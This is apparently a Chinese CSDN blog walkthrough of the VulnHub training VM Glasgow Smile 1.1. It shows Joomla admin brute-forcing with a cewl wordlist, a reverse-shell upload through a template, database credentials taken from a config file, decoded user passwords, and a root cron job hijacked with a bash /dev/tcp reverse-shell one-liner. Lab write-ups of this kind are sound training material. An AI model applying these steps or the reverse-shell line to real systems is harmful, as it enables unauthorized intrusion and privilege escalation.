Glasgow Smile系列:1

最新推荐文章于 2024-09-14 21:10:44 发布
最新推荐文章于 2024-09-14 21:10:44 发布
阅读量675 收藏 17
点赞数 25
文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zkaqlaoniao/article/details/137811642
版权

靶机描述

靶机地址:https://download.vulnhub.com/glasgowsmile/GlasgowSmile-v1.1.zip

Description

Title: Glasgow Smile

  • Users: 5

  • Difficulty Level: Initial Shell (Easy) - Privileges Escalation (Intermediate)

  • Hint: Enumeration is the key.

If you are a newbie in Penetration Testing and afraid of OSCP preparation, do not worry. Glasgow Smile is supposed to be a kind of gym for OSCP machines.
The machine is designed to be as real-life as possible. Anyway, You will find also a bunch of ctf style challanges, it’s important to have some encryption knowledge.
You need to have enough information about Linux enumeration and encryption for privileges escalation.

ABOUT THE VM:

Just download, extract and load the .vmx file in VMware Workstation (tested on VMware Workstation 15.x.x)
The adapter is currently NAT, networking is configured for DHCP and IP will get assigned automatically

CONTACT:

You can contact me on Hack the box (https://www.hackthebox.eu/profile/232477) or by email (mindsflee@hotmail.com) for hints!

Changelog 2020-06-16 - v1.1 2020-06-15 - v1.0

信息收集

利用arp-scan -l命令扫描靶机IP

 

  1.  
    arp-scan -l
     
 

 

图片
 


 使用nmap扫描开放端口
 

 

  1.  
    nmap -sV -p- 192.168.75.172
     
 

 

图片
 


 访问80端口并进行目录爆破
 

 

图片
 

 

  1.  
    dirsearch -u http://192.168.75.172/
     
 

 

图片
 

密码爆破
 

joomla/administrator是一个后台登陆页面
 

 

图片
 

 

  1.  
    命令:cewl http://192.168.75.172/joomla -m 5 -d 1 -w joomla.txt
     
  2.  
    -w 写入当前目录的文件中
     
  3.  
    -d 表示爬取深度,默认是2
     
  4.  
    -m 表示最小字符长度
     
 

 

图片
 


 生成字典后对joomla登录页面进行爆破
 

 

图片
 

 

图片
 

漏洞利用
 

找到Extensions->Templates->Templates->Beez3 Details and Files上传反弹shell
 

 

图片
 

 

图片
 

反弹shell
 

 

图片
 

 

图片
 


 获得交互式shell
 

 

  1.  
    python -c 'import pty; pty.spawn("/bin/bash")'
     
 

 

图片
 


 进入到/var/www发现有一个joomla2的目录
 

 

图片
 


 查看配置文件发现数据库的账号和密码
 

 

图片
 

连接数据库
 

 

图片
 

 

图片
 

 

图片
 


rob为此虚拟机的一个用户,将rob的密码进行base64解密
 

 

图片
 

 

图片
 

 

  1.  
    ???AllIHaveAreNegativeThoughts???
     
 

rob连接ssh
 

使用rob的密码进行ssh登录
 

 

图片
 


 发现一个加密文件
 

 

图片
 

  1.  
    Abnerineedyourhelp文件名断句分析,Abner I need your help像是一封求助信,打开后看到经过了某种编码加密,从一封信的角度来看,对内容做隐藏让我想到ROT13
     
  2.  
    Howtoberoot听名字就知道,这应该是提升权限的一个关键点,上面第一个文件应该给到了提示
     
 

解密
 

在线解密工具:https://gchq.github.io/CyberChef/
 

 

图片
 

 

图片
 

 

  1.  
    abner:I33hope99my0death000makes44more8cents00than0my0life0
     
 

abner连接ssh
 

 

图片
 


 现在查看一下三个账户剩下的最后一个账户penguin,查找一下有关penguin的信息
 

 

  1.  
    find / -iname *penguin* 2>/dev/null //找属于penguin的文件
     
 

 

图片
 


 切换到该目录进行查看
 

 

图片
 


 将该文件移动到abner用户的主目录下进行解压,否则没有权限
 

 

  1.  
    cp /var/www/joomla2/administrator/manifests/files/.dear_penguins.zip ~
     
  2.  
    //~表示$HOME即用户根目录
     
 

查看解压出来的文件,尝试一下最后的密码是不是penguins的密码
 

 

图片
 

 

  1.  
    scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz
     
 

 

图片
 

提权
 

利用文件权限配置不当进行提权
 当某个进程启动权限为root,对应文件编辑权限为普通用户时,我们可以利用该问题点进行提权
 

 

图片
 

pspy64
 

https://github.com/DominicBreuker/pspy
 

 

图片
 

 

  1.  
    chmod + pspy64
     
  2.  
    ./pspy64
     
 

发现隐藏文件.trash_ol一分钟执行一次,前面发现这个.trash_old是可以编辑的,那就用他来反弹shell
 

 

图片
 

 

  1.  
    bash -c 'bash -i >& /dev/tcp/192.168.75.150/7777 0>&1'
     
 

 

图片
 


 一分钟后,计划任务程序会自动运行.trash_old,最终获取root权限
 

 

图片
 

 

 申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。
 

免费领取安全学习资料包!
 

渗透工具
 

 

技术文档、书籍
 

 
 

 

面试题
 

帮助你在面试中脱颖而出
 

 

视频
 

基础到进阶
 

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等
 

 
 

 

应急响应笔记
 

 

学习路线
 


                

        

        

    

  


    

      

        

            

              
                
                  渗透测试老鸟-九青
                
              
            

            

                关注
              
            

        

        

          
      

      









                



	

		

			

				
					
GlasgowSmile-v2靶机全程(超详细!)

				
			

			

				

					qq_68868384的博客
				

				

					08-09
					
					195
					
				

			

		

		

			
				
在这里我们可以自己创建一个zipfile.py文件,在moonlight.py所在的目录,这样python调用的时候就会先调用我们这个zipfile.py,我们在这个文件中写一个反弹shell,因为moonlight.py是以venom身份运行的,所以我们可以返回一个venom的shell。我们把这个key复制到kali中创建一个tmp文件,然后执行以下代码,让每行以AF结尾输出到a.txt中去,再执行我们的解密代码,再把换行符删除掉就解密成功,出现了我们第二个密码。

			
		

	



                

              
                



	

		

			

				
					
Glasgow Smile

				
			

			

				

					m0_46580995的博客
				

				

					10-02
					
					325
					
				

			

		

		

			
				
dirb 扫描目录发现 joomla
joomscan扫一下
cewl -m 5 http://192.168.1.106/joomla/ > dic-words.txt
生成字典爆破用户名密码
得到joomla Gotham
登录后把index.php改成shell

访问并得到shell
在webconfig中·发现mysql用户名密码
登录mysql
找到rob登录密码ssh登录
找到一串rot13
再base64
更换用户
去网站根目录下枚举文件
看见一个隐藏文件
开启pythonhttp服务

			
		

	



                


  
              

                


	

		

			

				
					
零基础打靶—Glasgow Smile靶场

				
			

			

				

					qq_61861243的博客
				

				

					06-06
					
					1334
					
				

			

		

		

			
				
10、将复制的shell脚本上传到/index.php中(全部替换),在第48行附近找到ip和port,将ip更改为攻击机的IP,端口可以自己设定(设定合理即可,这里为1234)之后在kali中打开监听 nc-1nvp 1234。12、去/var/www/目录查看有html和joomla2文件,查看joomla2文件,发现了configuration.php,查看该文件,发现了一个数据的用户名和密码。3、我访问Joomla站点,发现只有一个帖子,其中有电影“小丑”的两个场景对话,还发现一个登录窗口。

			
		

	





	

		

			

				
					
vulnhub靶机GlasgowSmile

				
			

			

				

					weixin_52450702的博客
				

				

					10-28
					
					487
					
				

			

		

		

			
				
靶机下载地址靶机 ip:192.168.70.159。

			
		

	



		

			
		



	

		

			

				
					
GlasgowSmile-v2靶机复盘

				
			

			

				

					weixin_44681307的博客
				

				

					07-09
					
					146
					
				

			

		

		

			
				
在这里我们可以自己创建一个zipfile.py文件,在moonlight.py所在的目录,这样python调用的时候就会先调用我们这个zipfile.py,我们在这个文件中写一个反弹shell,因为moonlight.py是以venom身份运行的,所以我们可以返回一个venom的shell。发现开通了22,80,83,但是8080端口是个开启我们无法访问的状态,所以可以猜测,这个端口可能没有对外开放,只有本地可以访问。

			
		

	





	

		

			

				
					
GlasgowSmile靶机渗透记录(超全超详细适用于刚接触网安的小白们)

				
			

			

				

					2301_78192136的博客
				

				

					11-07
					
					324
					
				

			

		

		

			
				
重新阅读文件内容,该文件以英文写成类似一封信,但一个单词都不认识,联想到凯撒密码,尝试偏移量1进行解密,得到两段文字,其中一段很容易判断出其大意,猜测其可能为正确解码内容,再对文末的base64加密内容进行解密,得到一串密码。当前计算机的登录用户有root(超管),rob,abner,penguin,sync,mysql,而sync和mysql用户可能是使用某些服务的用户,暂不考虑提权为这两个用户,所以提权目标就是rob,abner,penguin这三个账户,进一步提升为root账户。

			
		

	





	

		

			

				
					
vulhub-Glasgow Smile:1.1

				
			

			

				

					2201_75378806的博客
				

				

					05-14
					
					299
					
				

			

		

		

			
				
账号:penguin,密码:scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz。结合文件内容,发现.trash_old属于用户penguin,root组并且任何人都可执行。2>/dev/null 找与penguin有关的文件       -iname就是包含。我们之前查看/etc/passwd是由abner penguin rob三个用户的,AllIHaveAreNegativeThoughts?咱们想先去枚举一下joomla目录下有没有有凭证密码的文件。

			
		

	





	

		

			

				
					
红队打靶练习:GLASGOW SMILE: 1.1

				
			

			

				

					分享
				

				

					02-08
					
					942
					
				

			

		

		

			
				
红队打靶练习:GLASGOW SMILE: 1.1。。。joomla cms利用!pspy利用!不难!

			
		

	





	

		

			

				
					
Glasgow4Freshers:格拉斯哥大学新生的Django大学计划

				
			

			

				

					03-30
				

			

		

		

			
				
1. **Django的核心组件**  - **模型(Model)**:模型是数据的Python表示,定义了数据库中的表格结构。通过Django的ORM(对象关系映射),开发者可以轻松地操作数据库,无需直接编写SQL语句。  - **视图(View)**:...

			
		

	





	

		

			

				
					
transportation-xml-glasgow:格拉斯哥道路交通事件和停车场占用情况的 XML 流解析器

				
			

			

				

					06-19
				

			

		

		

			
				
运输-xml-格拉斯哥 用于格拉斯哥交通事件和停车场占用情况的 XML 拉式解析器。  这将解析和提取格拉斯哥“智慧城市”数据源中的记录:  精通。  快速地。  可取消的中间解析。  由于文档被解析为流,因此内存要求低...

			
		

	





	

		

			

				
					
GPC:Glasgow Parallel Reduction Machine 的纯函数式语言

				
			

			

				

					06-04
				

			

		

		

			
				
GPC 是 Glasgow Parallel Reduction Machine (GPRM) 框架的前端语言,也是我作为格拉斯哥大学学生的荣誉年度项目。 该语言是 C++ 的子集,添加了两个关键字(“seq”和“par”)来表示代码块的顺序或并行执行。 默认...

			
		

	





	

		

			

				
					
glasgow.zip

				
			

			

				

					08-30
				

			

		

		

			
				
1. "glasgow.dxf" - 这是一个DXF(Drawing Exchange Format)文件,它是AutoCAD和其他CAD软件之间交换图形数据的标准格式。DXF文件通常包含二维或三维的几何形状、图层信息、颜色定义等,非常适合存储和共享工程图档...

			
		

	





	

		

			

				
					
时间&安全精细化管理平台存在未授权访问漏洞

				
			

			

				

					2301_77012231的博客
				

				

					09-14
					
					85
					
				

			

		

		

			
				
登录--时间&安全精细化管理平台存在未授权访问漏洞导致与员工信息泄露。

			
		

	





	

		

			

				
					
注册安全分析报告:熊猫频道

				
			

			

				

					Explinks的博客
				

				

					09-10
					
					605
					
				

			

		

		

			
				
熊猫频道作为央视的子频道, 采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的” , “我们怎么会被盯上呢,不可能的”等等。有一些理由虽然有道理,但是该来的总是会来的。前期欠下来的债,总是要还的。越早还,问题就越小,损失就越低。

			
		

	





	

		

			

				
					
3.比 HTTP 更安全的 HTTPS(工作原理理解、非对称加密理解、证书理解)

				
			

			

				

					weixin_52173250的博客
				

				

					09-07
					
					1545
					
				

			

		

		

			
				
HTTPS(Hypertext Transfer Protocol Secure)是一种安全的超文本传输协议,主要用于在客户端和服务器之间安全地传输数据

			
		

	





	

		

			

				
					
Java代码审计篇 | ofcms系统审计思路讲解 - 篇4 | XXE漏洞审计

					
最新发布

				
			

			

				

					哦 卷!
				

				

					09-14
					
					390
					
				

			

		

		

			
				
我发现很多文章包括教程,大概套路是:只说有漏洞的点,将有漏洞的点指出,然后分析代码;或者黑盒测试出漏洞之后,然后分析代码。我认为这是在分析漏洞代码,而非代码审计。代码审计文章或教程应该是从0开始找到漏洞所在,包括思路!所以这里不管有没有漏洞,我都会把审计过程写出来,因此篇幅会很长,但我认为这样对你会很有帮助。知其然亦知所以然。XXE漏洞审计Java代码审计篇 | ofcms系统审计思路讲解 - 篇1 | 环境搭建、路由机制。

			
		

	





	

		

			

				
					
远程跨境传输大文件如何做到安全又稳定?

				
			

			

				

					镭速的博客
				

				

					09-14
					
					206
					
				

			

		

		

			
				
在当今全球化的商业环境中,企业跨境传输大文件的需求日益增长。这不仅涉及到数据的快速迁移,还包括了安全性、稳定性和合规性等多重挑战。本文将探讨企业在跨境传输大文件时可能遇到的问题,以及在传输过程中应注意的事项,并重点介绍镭速在方面的优势。

			
		

	





	

		

			

				
					
企业如何构建有效的数据泄露防护安全体系

				
			

			

				

					A526847的博客
				

				

					09-14
					
					267
					
				

			

		

		

			
				
在当今数字化时代,企业数据已成为核心资产,其安全性直接关系到企业的竞争力、客户信任度以及法律合规性。数据泄露事件频发,不仅会导致经济损失,还可能损害企业声誉和客户关系。因此,构建有效的数据泄露防护安全体系已成为企业不可或缺的重要任务。

			
		

	





	

		

			

				
					

				
			

			

				

					
				

			

		

		

			
				

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值